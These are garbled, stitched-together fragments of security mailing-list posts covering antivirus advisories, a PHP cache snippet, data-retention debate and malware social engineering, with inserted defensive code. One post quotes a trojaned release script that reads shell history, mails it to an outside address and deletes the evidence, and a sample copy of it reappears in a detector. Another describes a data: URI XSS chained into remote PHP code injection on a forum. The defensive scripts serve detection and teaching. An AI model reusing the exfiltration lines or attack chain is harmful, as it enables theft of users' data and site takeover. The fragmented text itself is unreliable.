"defenses". - Browser detects loop or script that doesn't exit, asks user if he
wants to stop it. Been there, done that.
SMC> If you try to load the full XML downloads from cve.mitre.org into your
SMC> browser, good luck with that - you get CPU and memory consumption very
SMC> quickly (last time I checked).
Apples and oranges: nobody said CPU consumption is a vulnerability per
se. The possible impact is what makes it a vulnerability or not, such as
browser crashes, OS reboots, etc. pp.
I still have trouble understanding why some are not using the impact
$cacheFile = fopen($this->cacheDir.$this->cacheFile, "w");
fwrite($cacheFile, $data);
fclose($cacheFile);
}
// fsockopen failed the last time, so force cache
elseif ( $forcecache == true )
{
if (file_exists($this->cacheDir.$this->cacheFile)) {
$data = implode('', file($this->cacheDir.$this->cacheFile));
// set the modified time to a future time, and let the server have time to come up again
in version 4.5.0. Vendor didn't reply if said version is
now in circulation.
CVE : none provided
Credit : Given in the History file
OSVDB vendor entry: none [1]
Security notification reaction rating : better than last time
Notification to patch window : n+1 (no patch for current build)
Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html
cat $HOME/.bash_history >> /tmp/.bx 2>/dev/null
mail defcola@gmail.com < /tmp/.bx
sleep 4
rm -rf /tmp/.bx
What's up with this? Last time I downloaded this that wasn't there,
and it's the same version number but different md5.
.. and this file wasn't included.
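The poster's situation (same version number, different md5, an extra file with an exfiltration snippet) is the kind of thing a download check can catch mechanically. The following is an added example written for this page, not code from the original post or from the project being discussed: it compares two unpacked copies of a release, lists files that were added or changed, and flags shell scripts that carry the history-to-mail-to-delete pattern quoted above. The release trees, file names and the placeholder mail address are constructed for illustration; the `cksum` fallback is for systems without `md5sum`.

```shell
#!/bin/sh
# Added example, not from the original post. Compares two copies of a
# "release-1.0" download and scans scripts for the exfiltration pattern
# quoted in the thread. All inputs below are constructed for illustration.
set -eu
export LC_ALL=C   # deterministic sort order for file listings

hash_file() {
    # md5 when available (the poster compared md5s), POSIX cksum otherwise
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    else
        cksum "$1" | cut -d' ' -f1
    fi
}

# Print one line per file that is new in $2 or differs from its copy in $1.
changed_files() {
    old="$1"; new="$2"
    (cd "$new" && find . -type f | sort) | while read -r f; do
        if [ ! -f "$old/$f" ]; then
            echo "ADDED $f"
        elif [ "$(hash_file "$old/$f")" != "$(hash_file "$new/$f")" ]; then
            echo "CHANGED $f"
        fi
    done
    return 0
}

# Indicators taken from the quoted snippet: reading shell history, piping a
# file into mail, and removing a temp file under /tmp. Two or more of them
# in one script is treated as suspect.
EXFIL_PATTERN='\.bash_history|mail .*<|rm -rf /tmp/'
flag_exfil() {
    tree="$1"
    find "$tree" -type f -name '*.sh' | sort | while read -r f; do
        hits=$(grep -cE "$EXFIL_PATTERN" "$f" || true)
        if [ "$hits" -ge 2 ]; then
            echo "SUSPECT ${f#$tree/} ($hits indicators)"
        fi
    done
    return 0
}

# Constructed sample: the first download is clean, the second carries an
# extra script and a backdoored install.sh. Prints the temp dir it made.
make_samples() {
    base=$(mktemp -d)
    mkdir -p "$base/first/release-1.0" "$base/second/release-1.0"
    for d in first second; do
        printf 'VERSION=1.0\n' > "$base/$d/release-1.0/VERSION"
        printf '#!/bin/sh\necho installing\n' > "$base/$d/release-1.0/install.sh"
    done
    # Same shape as the snippet quoted in the post; address is a placeholder.
    cat >> "$base/second/release-1.0/install.sh" <<'EOF'
cat $HOME/.bash_history >> /tmp/.bx 2>/dev/null
mail nobody@example.invalid < /tmp/.bx
sleep 4
rm -rf /tmp/.bx
EOF
    printf 'echo extra\n' > "$base/second/release-1.0/extra.sh"
    echo "$base"
}

main() {
    base=$(make_samples)
    echo "== files added or changed between the two downloads =="
    changed_files "$base/first/release-1.0" "$base/second/release-1.0"
    echo "== scripts showing exfiltration indicators =="
    flag_exfil "$base/second/release-1.0"
    rm -rf "$base"
}
main
```

In practice you would run `changed_files` against the copy you unpacked last time and the one you just fetched; a version number that does not change while the archive hash does is exactly the case where a file-level diff, not a single md5 of the tarball, tells you what moved.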
----
Chris
What is even better is that the exploit will work outright if the admin/moderator
is already logged in; if the admin/moderator is not, they will be required to log
in. However, if an admin logs into the MCP, he is also logged into the ACP,
allowing the same exploit as last time (remote PHP code injection via the hooks
system). If you Base64-encode your attack vector using the data: URI scheme, the
XSS survives the login request and activates after the admin/moderator is logged
in. A simple example of the above:
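The payload described above only works because a data: URI is accepted where a link is expected. The following is an added example written for this page, not code from the original post or from phpBB: it contrasts a prefix check, which obfuscated schemes slip past, with a parse-then-allow-list check using Node's WHATWG URL parser, which normalises leading whitespace, embedded tabs and scheme case before the protocol is compared. The base URL `https://forum.example/`, the sample links and the harmless constructed HTML inside the data: URI are assumptions made for illustration.

```javascript
// Added example, not from the original post or from phpBB. Shows why a
// user-supplied link must be parsed before its scheme is allow-listed.
// Runs under Node.js; sample inputs below are constructed for illustration.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// The kind of check that looks sufficient but only inspects the literal prefix.
function naiveIsSafe(href) {
  return !href.startsWith("javascript:") && !href.startsWith("data:");
}

// Parse first, then allow-list. The WHATWG parser strips leading C0/space
// characters, removes embedded tabs and newlines, and lower-cases the scheme,
// so obfuscated variants resolve to their real protocol. Relative links are
// resolved against the (assumed) forum origin and therefore pass as https:.
function isSafeLink(href, base = "https://forum.example/") {
  let url;
  try {
    url = new URL(href, base);
  } catch (e) {
    return false; // unparseable input is rejected, not passed through
  }
  return ALLOWED_PROTOCOLS.has(url.protocol);
}

// Links that the prefix check accepts but the parse-first check rejects.
function findBypasses(links) {
  return links.filter((href) => naiveIsSafe(href) && !isSafeLink(href));
}

// A base64-encoded data: URI carrying a script, the shape the post describes.
// The document inside it is constructed and harmless.
const payloadHtml = "<script>document.title = 'xss'</script>";
const b64 = Buffer.from(payloadHtml).toString("base64");
const dataUri = "data:text/html;base64," + b64;

const samples = [
  "https://forum.example/viewtopic.php?t=1", // ordinary absolute link
  "/mcp.php?i=main",                         // relative, resolves to https:
  dataUri,                                   // plain data: URI
  "  DATA:text/html;base64," + b64,          // leading spaces, upper-case scheme
  "java\tscript:alert(1)",                   // tab inside the scheme
  "javascript:alert(1)",
];

for (const href of samples) {
  console.log(
    JSON.stringify(href).padEnd(48),
    "naive:", naiveIsSafe(href),
    "parsed:", isSafeLink(href)
  );
}
console.log("bypasses of the prefix check:", findBypasses(samples));
```

The same allow-list belongs on every sink that takes a user-controlled URL (`href`, `src`, redirect targets); rejecting by deny-list of known bad schemes is what the obfuscated samples defeat.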
as usual, we have our own room with its own bar (1st floor, with its
own entrance from the street or from the back of the downstairs bar).
As well as real ales and wife beater, good food is also available, but
last food orders are strictly at 21:00, so make sure you get yours in in
plenty of time and don't go hungry like I did last time!!! :P
meet starts at 19:00, talks at 19:30
this month we have:
Hi, like last time, we are looking for community input and questions for the
Internet security operations community, to be discussed during ISOI 3.
ISOI is happening this Monday and Tuesday, we will likely compile the responses
in a few weeks.
We will reply to people personally on issues which bother them, and compile a
short text with answers to the community itself.
We tried to do this last time around, and encountered a problem with
It's always been possible to steal local files if you can convince a
user to open a "harmless" HTML file from their local filesystem. This
is possible because the scripting code runs within local context (in
FF terminology; not sure what Safari calls it).
Last time I checked [1] [2] FF didn't even issue a warning when
opening a local file with scripting code in it, although I haven't
checked in the case of Safari.
[1] http://www.gnucitizen.org/blog/web-pages-from-hell-2/
[2] http://marc.info/?l=bugtraq&m=116386919506057&w=2
The signal-to-noise logic probably does work, but I am not sure the legal
angle does. If you *deliberately* ran the software that accidentally
downloaded that kiddie porn the suggested angle might not work.
A law requiring log data to be retained for 6 months should be a major problem
to enforce. Last time I think the UK mooted this it did not happen
(disclaimer: this might have been a trial balloon designed to generate flak).
My reaction at the ISP end was "OK, will you buy us the extra hardware
required?" with the intention the answer would be "no" and the plan quietly
killed. (Thinking that plain daft things will not be enacted is not always
reliable, unfortunately).
Status : Current version not patched, next engine version patched
Date unknown, vendor doesn't answer any longer.
CVE : none provided
Credit : none provided
OSVDB vendor entry: none [1]
Security notification reaction rating : better than last time
Notification to patch window : n+1 (no patch for current build)
Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html
during analysis.
>
> A law requiring log data to be retained for 6 months should be a
> major problem
> to enforce. Last time I think the UK mooted this it did not happen
> (disclaimer: this might have been a trial balloon designed to
> generate flak).
> My reaction at the ISP end was "OK, will you buy us the extra hardware
> required?" with the intention the answer would be "no" and the plan
> quietly
Vendor : http://www.f-prot.com
Status : Current version not patched, next engine version will be patched
CVE : none provided
Credit : Given in the History file
OSVDB vendor entry: none [1]
Security notification reaction rating : better than last time
Notification to patch window : n+1 (no patch for current build)
Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html
But if you think of the infinite number of algorithms you could write in
Javascript, then it becomes a recipe for the death of a thousand cuts.
If you try to load the full XML downloads from cve.mitre.org into your
browser, good luck with that - you get CPU and memory consumption very
quickly (last time I checked). But is that a vulnerability per se? It
almost becomes a "laws-of-physics" vulnerability - if you send too much
data to an underpowered system with a small pipe, then a DoS is going to
occur because you can't violate the laws of physics. If you enforce some
resource restrictions, then you wind up with an incomplete rendering of
data (incorrect behavior) at least.
NOTE: Resending this was blocked last time.
Profit-driven malware has gotten very good at using Social Engineering
(backed up with Exploits) to spread itself. Zlob and its Codecs are one
particular example that has worked very well on Windows, even by
simply getting the user to install the software willingly. The
Storm/Zhelatin/Russian Business Network group however are by far the
best at this. They have shown time and time again the power of simple Social
Engineering in order to infect victims' machines. Zlob may have been
the first for-profit malware to make the jump, but if it proves